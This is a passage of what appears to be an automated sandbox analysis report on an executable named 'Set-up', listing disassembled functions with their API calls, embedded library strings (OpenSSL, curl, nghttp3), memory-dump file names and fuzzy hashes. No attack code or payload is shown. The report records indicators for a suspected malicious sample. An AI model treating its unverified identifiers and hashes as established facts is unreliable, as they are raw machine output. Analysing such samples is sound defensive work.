memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,006F2BF4,00000008), ref: 006F2312

Strings

general_set_uint, xrefs: 006F22D2
copy_integer, xrefs: 006F228B
crypto/params.c, xrefs: 006F2295, 006F22DC

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: copy_integer$crypto/params.c$general_set_uint
API String ID: 1297977491-3191580373
Opcode ID: 532e184c7f6f6e6f740c48f0be9b9dbed628470f62650938b411d54df0ce0b39
Instruction ID: 24776607d375be556d240a0ca0cc86030f6b7cd88ef380f756907b607cd72c71
Opcode Fuzzy Hash: 532e184c7f6f6e6f740c48f0be9b9dbed628470f62650938b411d54df0ce0b39
Instruction Fuzzy Hash: E021B1B17083062BDB34A5649C66F7A778BE7D1704F18002DF649C63C3D599EE414E61

Function 006F40A0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,006F2075,?,?,?,?,?,?,006F2704,00000008), ref: 006F40C1

Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7262
Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7285
Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72C5
Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72E8

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,006F2075,?,?,?,?,?,?,006F2704,00000008), ref: 006F411E

Strings

copy_integer, xrefs: 006F4134
crypto/params.c, xrefs: 006F40DD, 006F413E
unsigned_from_signed, xrefs: 006F40D3

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcpymemset
String ID: copy_integer$crypto/params.c$unsigned_from_signed
API String ID: 2323844366-3781254518
Opcode ID: 00beb5985515e344961c28e4961962326f82f89667f70c5c7da7abdfd3c86628
Instruction ID: 85fc4f2f2532ef9a77d6a5ca1fc8695579eefe8f83602513f9eb2c95c8d17da9
Opcode Fuzzy Hash: 00beb5985515e344961c28e4961962326f82f89667f70c5c7da7abdfd3c86628
Instruction Fuzzy Hash: 0A012D61B4435136D63072646C07F7B2B4ACBD1B14F1C047DF748E65C3EDD9684542A6

Function 005BE600 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00B1811C,nghttp3_qpack.c,00000811,?,?), ref: 005BE866
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(space <= ctx->max_dtable_capacity,nghttp3_qpack.c,0000080D,?,?,?,?,?,005C077F,?,?,00000000,00000000), ref: 005BE87B

Strings

nghttp3_qpack.c, xrefs: 005BE85C, 005BE871
space <= ctx->max_dtable_capacity, xrefs: 005BE876

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_qpack.c$space <= ctx->max_dtable_capacity
API String ID: 1222420520-1270044496
Opcode ID: 6378582c8475a2a82ac3fce9fa81cc071a2d00e761db4fa523ac5d4c9f6a6458
Instruction ID: 55209365c71caca2af419b7f1dcd0231c51939f630ce7f4fb05cf1d2fb4164ec
Opcode Fuzzy Hash: 6378582c8475a2a82ac3fce9fa81cc071a2d00e761db4fa523ac5d4c9f6a6458
Instruction Fuzzy Hash: 2F81B375A00A029FD710DF24D846AA6BBF5FF89314F08462CF84A87752EB31F895CB91

Function 005181B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150stringCOMMON

Download Yara Rule

APIs

_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(005154E6), ref: 00518235
strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002F), ref: 005182D4
strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005C), ref: 005182E1

Strings

mime.c, xrefs: 0051824C, 005182B8, 0051832D, 00518342, 0051835E, 0051837A, 0051839C

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strrchr$_stat64
String ID: mime.c
API String ID: 2771713950-3378952128
Opcode ID: 77f9c46432076238ca1407f1e54548d4fb478ed24efa0bb46575a8e9aba20c9e
Instruction ID: f06db37fc4804c845a548eebdc4e185a02d41cf8c3c3c36cc7ac414ab1e96a72
Opcode Fuzzy Hash: 77f9c46432076238ca1407f1e54548d4fb478ed24efa0bb46575a8e9aba20c9e
Instruction Fuzzy Hash: F251E7B1A007019BFB249F28CC867B73EA4BF44750F184668FD289F2C6EB75C9848791

Function 00554380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111stringnetworkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 005543D8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00554409
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000020,?,00000001), ref: 00554457

Strings

curl_addrinfo.c, xrefs: 00554429, 005544C3

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: htonsmemcpystrlen
String ID: curl_addrinfo.c
API String ID: 2973076469-1838508774
Opcode ID: 773a571cc794f1e171e16aaa094bed60da0a12febf3e11000e2cc5588c4a2d90
Instruction ID: 79066444917936ca5c8d2f3d1b6c7e55c782b8c7068df23466236198a742b66b
Opcode Fuzzy Hash: 773a571cc794f1e171e16aaa094bed60da0a12febf3e11000e2cc5588c4a2d90
Instruction Fuzzy Hash: 40415CB5A04705AFDB10DF58C481A6ABBE4FF88314F04892EFD898B351E371E994CB91

Function 00546650 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105stringCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?), ref: 0054665D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0054670E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000010), ref: 0054671C

Strings

altsvc.c, xrefs: 00546699, 005466AB, 005466BD

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strlen$_time64
String ID: altsvc.c
API String ID: 2413861649-3234676706
Opcode ID: 3ad8ea507e75f85fe264d52aeb01bfd2c2956f1e44a86844af4ef14fb4ac67d3
Instruction ID: 36ec8e4f4beebc208fdf47d992d75c89c0ff28c66e925e6afbeda3f694d2ee07
Opcode Fuzzy Hash: 3ad8ea507e75f85fe264d52aeb01bfd2c2956f1e44a86844af4ef14fb4ac67d3
Instruction Fuzzy Hash: 0031F9B5A043056BDB10EE24AC86AAB3FE4BB95758F084838FD0D96252F631DD44D693

Function 005B42E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 005B435F
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,00000000,?), ref: 005B43EF

Strings

tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 005B435A, 005B43EA
nghttp3_conn.c, xrefs: 005B4355, 005B43E5

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: 9b4a98e476090215557f8942c01bf285fde5803b3d550ff592d75b37f47ecc6a
Instruction ID: f0d147b4e03afeb4f3cc79d5adb57dd29e5d35963a11369b448c7844453b1bc5
Opcode Fuzzy Hash: 9b4a98e476090215557f8942c01bf285fde5803b3d550ff592d75b37f47ecc6a
Instruction Fuzzy Hash: 7E318E72500245AFD7119F54EC09FDA3BE9BF85319F0908B8E9049B163E736E5688B61

Function 005BA090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(C2E85040,-0000000F,00000000,?,?,?,?,005B70DF,00000001,?,?,?), ref: 005BA0E5

Part of subcall function 005BA140: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 005BA29A

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,00000218,?,?,?,?,005B70DF,00000001,?,?,?), ref: 005BA135

Strings

ksl->head, xrefs: 005BA130
nghttp3_ksl.c, xrefs: 005BA12B

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _assertmemcpymemmove
String ID: ksl->head$nghttp3_ksl.c
API String ID: 374949274-2784241221
Opcode ID: f3ebb203d590cb9acd1b158124bd23080d1eed51d3c06588cf80583f185dde9f
Instruction ID: 7dd33427855e45e548c08ef2a378267a284842f9d6b03e9d32978ef9ab940ca0
Opcode Fuzzy Hash: f3ebb203d590cb9acd1b158124bd23080d1eed51d3c06588cf80583f185dde9f
Instruction Fuzzy Hash: E31193702002019FDB149F18D885A9AFBB6FF89304F18D55EF9098B642D734EC85CBA2

Function 005488C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

getsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0054893B
setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 00548960

Part of subcall function 00537620: GetModuleHandleA.KERNEL32(ntdll), ref: 0053763F
Part of subcall function 00537620: GetProcAddress.KERNEL32(00000000,RtlVerifyVersionInfo), ref: 0053764B
Part of subcall function 00537620: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,0000010C), ref: 00537695
Part of subcall function 00537620: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 005376D3
Part of subcall function 00537620: VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 005376DA
Part of subcall function 00537620: VerSetConditionMask.KERNEL32(00000000,?,00000020,?,?,00000001,?), ref: 005376E4
Part of subcall function 00537620: VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 005376EB
Part of subcall function 00537620: VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 005376FC

Strings

@, xrefs: 005488C4
@, xrefs: 00548945

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: ConditionMask$AddressHandleModuleProcgetsockoptmemsetsetsockopt
String ID: @$ @
API String ID: 2103437208-1089145642
Opcode ID: 428a8ab63c26888c6ae4a685523364bd8232010b5d8c19a6c4bd4cdb356551c8
Instruction ID: 4d19cef34b77facd38f2adc737ac4b71af872a43cfd35d27aad966e8a80c87de
Opcode Fuzzy Hash: 428a8ab63c26888c6ae4a685523364bd8232010b5d8c19a6c4bd4cdb356551c8
Instruction Fuzzy Hash: 7B01C0B05087429BE710AF14ED4E7BE7BE4BF41318F010828EA845A291E7B59988C642

Function 00638970 Relevance: 6.7, APIs: 5, Instructions: 425COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,FFC0BFFA,?), ref: 00638A9A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000001,?,?), ref: 00638AEA
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00638BD7
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00638C2B
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00638E63

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 751fe6b8f153e2c873314a8a2acb9f677612fc171bcee49430c66cab69ee0bbb
Instruction ID: 2e37309369dfd4cef1d4faf63f8c3d36f9afd088ee93710dafda4c255bcca6ae
Opcode Fuzzy Hash: 751fe6b8f153e2c873314a8a2acb9f677612fc171bcee49430c66cab69ee0bbb
Instruction Fuzzy Hash: 89F19BB1A017128FDB18CF18C59079ABBA2FF95310F18C56DE84A8B396DB35E845CBD0

Function 0053C5F0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 275COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0053C685

Part of subcall function 005173F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,0051CA95,00AF6A38,00000467,mprintf.c), ref: 0051741D
Part of subcall function 005173F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00517445

Part of subcall function 005173F0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,0051CA95,00AF6A38,00000467,mprintf.c), ref: 00517486
Part of subcall function 005173F0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 005174AA
Part of subcall function 005173F0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 005174B2

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0053C6CF
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0053C719

Strings

vtls/vtls.c, xrefs: 0053C653, 0053C69D, 0053C6E7, 0053C72E, 0053C756, 0053C77F, 0053C7A8, 0053C7D1, 0053C7FA, 0053C823, 0053C84C, 0053C875, 0053C935, 0053C95F

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpy$__acrt_iob_func_errnofflushstrlen
String ID: vtls/vtls.c
API String ID: 1294796744-169717415
